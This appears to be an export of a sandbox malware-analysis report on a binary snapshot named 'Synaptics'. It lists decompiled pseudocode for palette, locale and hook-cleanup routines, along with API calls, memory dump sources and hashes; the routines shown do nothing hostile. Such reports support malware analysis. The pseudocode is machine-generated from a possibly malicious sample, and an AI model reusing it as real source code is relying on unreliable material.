                                                                                                                                                                                                                            • Opcode ID: 2597941c910caa3ba4572272bd3ca43fbff399438b71026350468ce82a15d9f1
                                                                                                                                                                                                                            • Instruction ID: f3059b0da6ec3e1b640db76434b3b8e2fe7969af481d0775728bf7a32dd752b6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2597941c910caa3ba4572272bd3ca43fbff399438b71026350468ce82a15d9f1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A521C3706001049FD760EF31CD91ADAB7F8EF45304F5184FAA94CA7352DAB8AE418B98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                                                            			E0042A288(struct HPALETTE__* __eax) {
                                                                                                                                                                                                                            				struct HPALETTE__* _t21;
                                                                                                                                                                                                                            				char _t28;
                                                                                                                                                                                                                            				signed int _t30;
                                                                                                                                                                                                                            				struct HPALETTE__* _t36;
                                                                                                                                                                                                                            				struct HPALETTE__* _t37;
                                                                                                                                                                                                                            				struct HDC__* _t38;
                                                                                                                                                                                                                            				intOrPtr _t39;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t21 = __eax;
                                                                                                                                                                                                                            				_t36 = __eax;
                                                                                                                                                                                                                            				_t39 =  *((intOrPtr*)(__eax + 0x28));
                                                                                                                                                                                                                            				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
                                                                                                                                                                                                                            					_t22 =  *((intOrPtr*)(_t39 + 0x14));
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
                                                                                                                                                                                                                            						E00428BFC(_t22);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t21 = E00426750( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
                                                                                                                                                                                                                            					_t37 = _t21;
                                                                                                                                                                                                                            					 *(_t39 + 0x10) = _t37;
                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						L00407638();
                                                                                                                                                                                                                            						_t21 = E00426060(_t21);
                                                                                                                                                                                                                            						_t38 = _t21;
                                                                                                                                                                                                                            						if( *((char*)(_t39 + 0x71)) != 0) {
                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                            							_t28 = 1;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_push(0xc);
                                                                                                                                                                                                                            							_push(_t38);
                                                                                                                                                                                                                            							L00407380();
                                                                                                                                                                                                                            							_push(0xe);
                                                                                                                                                                                                                            							_push(_t38);
                                                                                                                                                                                                                            							L00407380();
                                                                                                                                                                                                                            							_t30 = _t21 * _t21;
                                                                                                                                                                                                                            							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
                                                                                                                                                                                                                            							if(_t30 < _t21) {
                                                                                                                                                                                                                            								goto L9;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t28 = 0;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						 *((char*)(_t39 + 0x71)) = _t28;
                                                                                                                                                                                                                            						if(_t28 != 0) {
                                                                                                                                                                                                                            							_t21 = CreateHalftonePalette(_t38);
                                                                                                                                                                                                                            							 *(_t39 + 0x10) = _t21;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_push(_t38);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						L00407888();
                                                                                                                                                                                                                            						if( *(_t39 + 0x10) == 0) {
                                                                                                                                                                                                                            							 *((char*)(_t36 + 0x30)) = 1;
                                                                                                                                                                                                                            							return _t21;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t21;
                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2DE
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2F3
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2FD
                                                                                                                                                                                                                            • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A32C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380CreateHalftonePalette
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 178651289-0
                                                                                                                                                                                                                            • Opcode ID: c8d4c93cc583ed9d9441793febc9cc7f1891d12bd8e01e95aafc8bbdf1e36651
                                                                                                                                                                                                                            • Instruction ID: a69a9921d942d4c2fc4b887ba219ee821ce262c4093934c48757552ca675d17f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8d4c93cc583ed9d9441793febc9cc7f1891d12bd8e01e95aafc8bbdf1e36651
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E211B4217092699BEB20EF25A4457EF3690AB10359F84012AFD0097281D7BC9CA5C3EA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 40%
                                                                                                                                                                                                                            			E004266B8(intOrPtr __eax) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                            				intOrPtr _t16;
                                                                                                                                                                                                                            				intOrPtr _t18;
                                                                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                                                                            				intOrPtr _t30;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t32 = _t34;
                                                                                                                                                                                                                            				_t35 = _t34 + 0xfffffff8;
                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                            				if( *0x49e894 == 0) {
                                                                                                                                                                                                                            					return _v5;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					L00407638();
                                                                                                                                                                                                                            					_v12 = __eax;
                                                                                                                                                                                                                            					_push(_t32);
                                                                                                                                                                                                                            					_push(0x42673e);
                                                                                                                                                                                                                            					_push( *[fs:edx]);
                                                                                                                                                                                                                            					 *[fs:edx] = _t35;
                                                                                                                                                                                                                            					_push(0x68);
                                                                                                                                                                                                                            					_t14 = _v12;
                                                                                                                                                                                                                            					_push(_t14);
                                                                                                                                                                                                                            					L00407380();
                                                                                                                                                                                                                            					if(_t14 >= 0x10) {
                                                                                                                                                                                                                            						_push(__eax + 4);
                                                                                                                                                                                                                            						_push(8);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_t18 =  *0x49e894; // 0x100805eb
                                                                                                                                                                                                                            						_push(_t18);
                                                                                                                                                                                                                            						L004073A8();
                                                                                                                                                                                                                            						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
                                                                                                                                                                                                                            						_push(8);
                                                                                                                                                                                                                            						_push(8);
                                                                                                                                                                                                                            						_t21 =  *0x49e894; // 0x100805eb
                                                                                                                                                                                                                            						_push(_t21);
                                                                                                                                                                                                                            						L004073A8();
                                                                                                                                                                                                                            						_v5 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t30);
                                                                                                                                                                                                                            					 *[fs:eax] = _t30;
                                                                                                                                                                                                                            					_push(0x426745);
                                                                                                                                                                                                                            					_t16 = _v12;
                                                                                                                                                                                                                            					_push(_t16);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					L00407888();
                                                                                                                                                                                                                            					return _t16;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 004266D0
                                                                                                                                                                                                                            • 73C9AD70.GDI32(?,00000068,00000000,0042673E,?,00000000), ref: 004266EC
                                                                                                                                                                                                                            • 73C9AEA0.GDI32(100805EB,00000000,00000008,?,?,00000068,00000000,0042673E,?,00000000), ref: 00426704
                                                                                                                                                                                                                            • 73C9AEA0.GDI32(100805EB,00000008,00000008,?,100805EB,00000000,00000008,?,?,00000068,00000000,0042673E,?,00000000), ref: 0042671C
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,00426745,0042673E,?,00000000), ref: 00426738
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 120756276-0
                                                                                                                                                                                                                            • Opcode ID: 26d92e3796d48fbf02547cc90baff66c5ce55989e6466209eef713e3b3d2153e
                                                                                                                                                                                                                            • Instruction ID: c0b5c4fbf9d89d63b7e1562d2f304591e56de7434d42fe68f424cbdc017dfa0b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 26d92e3796d48fbf02547cc90baff66c5ce55989e6466209eef713e3b3d2153e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B11A531A483047EFB41DBE5AC86F6D7BA8E745718F94806BFA04AA1C1D97A6404C729
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                                                            			E0040CBEC(void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				intOrPtr* _t18;
                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                            				long _t29;
                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t33 = __eflags;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(_t32);
                                                                                                                                                                                                                            				_push(0x40cc83);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t32;
                                                                                                                                                                                                                            				E0040C964(GetThreadLocale(), 0x40cc98, 0x100b,  &_v8);
                                                                                                                                                                                                                            				_t29 = E00409664(0x40cc98, 1, _t33);
                                                                                                                                                                                                                            				if(_t29 + 0xfffffffd - 3 < 0) {
                                                                                                                                                                                                                            					EnumCalendarInfoA(E0040CB38, GetThreadLocale(), _t29, "true");
                                                                                                                                                                                                                            					_t27 = 7;
                                                                                                                                                                                                                            					_t18 = 0x49e770;
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						 *_t18 = 0xffffffff;
                                                                                                                                                                                                                            						_t18 = _t18 + 4;
                                                                                                                                                                                                                            						_t27 = _t27 - 1;
                                                                                                                                                                                                                            					} while (_t27 != 0);
                                                                                                                                                                                                                            					EnumCalendarInfoA(E0040CB74, GetThreadLocale(), _t29, 3);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t26);
                                                                                                                                                                                                                            				 *[fs:eax] = _t26;
                                                                                                                                                                                                                            				_push(E0040CC8A);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,0040CC83,?,?,00000000), ref: 0040CC04
                                                                                                                                                                                                                              • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,?,00000000,0040CC83,?,?,00000000), ref: 0040CC34
                                                                                                                                                                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000CB38,00000000,00000000,?), ref: 0040CC3F
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040CC83,?,?,00000000), ref: 0040CC5D
                                                                                                                                                                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000CB74,00000000,00000000,00000003), ref: 0040CC68
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4102113445-0
                                                                                                                                                                                                                            • Opcode ID: 8248b440ae0a9565a755423cbf294169d4993abaad373ce74e76ef033f4fb80c
                                                                                                                                                                                                                            • Instruction ID: 1afeb0ae3c984d7c4f1a7fc68b04595db4598325ea28b3ac7f3617db3f710194
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8248b440ae0a9565a755423cbf294169d4993abaad373ce74e76ef033f4fb80c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70014270608204EBF701A7B5DD43F5E725CDB46B18F610737B900BA2C0D63CAE00826D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00458FB8() {
                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                            				void* _t5;
                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                            				struct HHOOK__* _t10;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				if( *0x49ebd0 != 0) {
                                                                                                                                                                                                                            					_t10 =  *0x49ebd0; // 0x0
                                                                                                                                                                                                                            					UnhookWindowsHookEx(_t10);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *0x49ebd0 = 0;
                                                                                                                                                                                                                            				if( *0x49ebd4 != 0) {
                                                                                                                                                                                                                            					_t2 =  *0x49ebcc; // 0x0
                                                                                                                                                                                                                            					SetEvent(_t2);
                                                                                                                                                                                                                            					if(GetCurrentThreadId() !=  *0x49ebc8) {
                                                                                                                                                                                                                            						_t8 =  *0x49ebd4; // 0x0
                                                                                                                                                                                                                            						WaitForSingleObject(_t8, 0xffffffff);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t5 =  *0x49ebd4; // 0x0
                                                                                                                                                                                                                            					CloseHandle(_t5);
                                                                                                                                                                                                                            					 *0x49ebd4 = 0;
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • UnhookWindowsHookEx.USER32(00000000), ref: 00458FC7
                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FE2
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00458FE7
                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FFC
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00459007
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2429646606-0
                                                                                                                                                                                                                            • Opcode ID: a01ab741e0556a9c02a6a949833d3b1770402395474016c92faede3881800cad
                                                                                                                                                                                                                            • Instruction ID: 3bc59d0302d60dcdb639d85b4c22765180d6681b902288d708a5b48c4f0846c4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a01ab741e0556a9c02a6a949833d3b1770402395474016c92faede3881800cad
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CF0ACB1905100EAC750EBBBED49A063395A724315F000A3BB112D71E1D73CF884CB1E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                            			E0040CC9C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                            				signed int _t45;
                                                                                                                                                                                                                            				signed int _t47;
                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                            				intOrPtr _t75;
                                                                                                                                                                                                                            				void* _t76;
                                                                                                                                                                                                                            				signed int _t77;
                                                                                                                                                                                                                            				signed int _t83;
                                                                                                                                                                                                                            				signed int _t92;
                                                                                                                                                                                                                            				intOrPtr _t111;
                                                                                                                                                                                                                            				void* _t122;
                                                                                                                                                                                                                            				void* _t124;
                                                                                                                                                                                                                            				intOrPtr _t127;
                                                                                                                                                                                                                            				void* _t128;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t128 = __eflags;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_t122 = __edx;
                                                                                                                                                                                                                            				_t124 = __eax;
                                                                                                                                                                                                                            				_push(_t127);
                                                                                                                                                                                                                            				_push(0x40ce66);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t127;
                                                                                                                                                                                                                            				_t92 = 1;
                                                                                                                                                                                                                            				E004049C0(__edx);
                                                                                                                                                                                                                            				E0040C964(GetThreadLocale(), 0x40ce7c, 0x1009,  &_v12);
                                                                                                                                                                                                                            				if(E00409664(0x40ce7c, 1, _t128) + 0xfffffffd - 3 < 0) {
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						_t41 = E00404C80(_t124);
                                                                                                                                                                                                                            						__eflags = _t92 - _t41;
                                                                                                                                                                                                                            						if(_t92 > _t41) {
                                                                                                                                                                                                                            							goto L28;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
                                                                                                                                                                                                                            						asm("bt [0x49b134], eax");
                                                                                                                                                                                                                            						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
                                                                                                                                                                                                                            							_t45 = E0040A0C8(_t124 + _t92 - 1, 2, 0x40ce80);
                                                                                                                                                                                                                            							__eflags = _t45;
                                                                                                                                                                                                                            							if(_t45 != 0) {
                                                                                                                                                                                                                            								_t47 = E0040A0C8(_t124 + _t92 - 1, 4, 0x40ce90);
                                                                                                                                                                                                                            								__eflags = _t47;
                                                                                                                                                                                                                            								if(_t47 != 0) {
                                                                                                                                                                                                                            									_t49 = E0040A0C8(_t124 + _t92 - 1, 2, 0x40cea8);
                                                                                                                                                                                                                            									__eflags = _t49;
                                                                                                                                                                                                                            									if(_t49 != 0) {
                                                                                                                                                                                                                            										_t51 =  *(_t124 + _t92 - 1) - 0x59;
                                                                                                                                                                                                                            										__eflags = _t51;
                                                                                                                                                                                                                            										if(_t51 == 0) {
                                                                                                                                                                                                                            											L24:
                                                                                                                                                                                                                            											E00404C88(_t122, 0x40cec0);
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											__eflags = _t51 != 0x20;
                                                                                                                                                                                                                            											if(_t51 != 0x20) {
                                                                                                                                                                                                                            												E00404BA8();
                                                                                                                                                                                                                            												E00404C88(_t122, _v24);
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												goto L24;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										E00404C88(_t122, 0x40ceb4);
                                                                                                                                                                                                                            										_t92 = _t92 + 1;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									E00404C88(_t122, 0x40cea0);
                                                                                                                                                                                                                            									_t92 = _t92 + 3;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								E00404C88(_t122, 0x40ce8c);
                                                                                                                                                                                                                            								_t92 = _t92 + 1;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t92 = _t92 + 1;
                                                                                                                                                                                                                            							__eflags = _t92;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_v8 = E0040DD78(_t124, _t92);
                                                                                                                                                                                                                            							E00404EE0(_t124, _v8, _t92,  &_v20);
                                                                                                                                                                                                                            							E00404C88(_t122, _v20);
                                                                                                                                                                                                                            							_t92 = _t92 + _v8;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t75 =  *0x49e748; // 0x9
                                                                                                                                                                                                                            					_t76 = _t75 - 4;
                                                                                                                                                                                                                            					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                                                                                                                                                                                                                            						_t77 = 1;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t77 = 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t77 == 0) {
                                                                                                                                                                                                                            						E00404A14(_t122, _t124);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						while(_t92 <= E00404C80(_t124)) {
                                                                                                                                                                                                                            							_t83 =  *(_t124 + _t92 - 1) - 0x47;
                                                                                                                                                                                                                            							__eflags = _t83;
                                                                                                                                                                                                                            							if(_t83 != 0) {
                                                                                                                                                                                                                            								__eflags = _t83 != 0x20;
                                                                                                                                                                                                                            								if(_t83 != 0x20) {
                                                                                                                                                                                                                            									E00404BA8();
                                                                                                                                                                                                                            									E00404C88(_t122, _v16);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t92 = _t92 + 1;
                                                                                                                                                                                                                            							__eflags = _t92;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L28:
                                                                                                                                                                                                                            				_pop(_t111);
                                                                                                                                                                                                                            				 *[fs:eax] = _t111;
                                                                                                                                                                                                                            				_push(E0040CE6D);
                                                                                                                                                                                                                            				return E004049E4( &_v24, 4);
                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                            0x0040ccf8
                                                                                                                                                                                                                            0x0040ccf8
                                                                                                                                                                                                                            0x0040ccfd
                                                                                                                                                                                                                            0x0040cd00
                                                                                                                                                                                                                            0x0040cd0e
                                                                                                                                                                                                                            0x0040cd0a
                                                                                                                                                                                                                            0x0040cd0a
                                                                                                                                                                                                                            0x0040cd0a
                                                                                                                                                                                                                            0x0040cd12
                                                                                                                                                                                                                            0x0040cd4d
                                                                                                                                                                                                                            0x0040cd14
                                                                                                                                                                                                                            0x0040cd39
                                                                                                                                                                                                                            0x0040cd1a
                                                                                                                                                                                                                            0x0040cd1a
                                                                                                                                                                                                                            0x0040cd1c
                                                                                                                                                                                                                            0x0040cd1e
                                                                                                                                                                                                                            0x0040cd20
                                                                                                                                                                                                                            0x0040cd29
                                                                                                                                                                                                                            0x0040cd33
                                                                                                                                                                                                                            0x0040cd33
                                                                                                                                                                                                                            0x0040cd20
                                                                                                                                                                                                                            0x0040cd38
                                                                                                                                                                                                                            0x0040cd38
                                                                                                                                                                                                                            0x0040cd38
                                                                                                                                                                                                                            0x0040cd44
                                                                                                                                                                                                                            0x0040cd12
                                                                                                                                                                                                                            0x0040ce4b
                                                                                                                                                                                                                            0x0040ce4d
                                                                                                                                                                                                                            0x0040ce50
                                                                                                                                                                                                                            0x0040ce53
                                                                                                                                                                                                                            0x0040ce65

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,0040CE66,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040CCCB
                                                                                                                                                                                                                              • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                                                                                                                            • String ID: eeee$ggg$yyyy
                                                                                                                                                                                                                            • API String ID: 4232894706-1253427255
                                                                                                                                                                                                                            • Opcode ID: d7b8b7849bcb72c5027e917725a1694d305817c4d1b349c38790e114d213c5c8
                                                                                                                                                                                                                            • Instruction ID: 4a597fd56ac0f87983323c6834d704910f88c0d9acca8889b228a53315074fe8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7b8b7849bcb72c5027e917725a1694d305817c4d1b349c38790e114d213c5c8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0541E5B0314504CBE711AB7AC8C12BEB69ADF85304BA1463BE542B37C5D63CED0782AD
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                            			E004392CC(intOrPtr __eax, intOrPtr __ecx, void* __edx, void* __fp0) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				struct tagPOINT _v20;
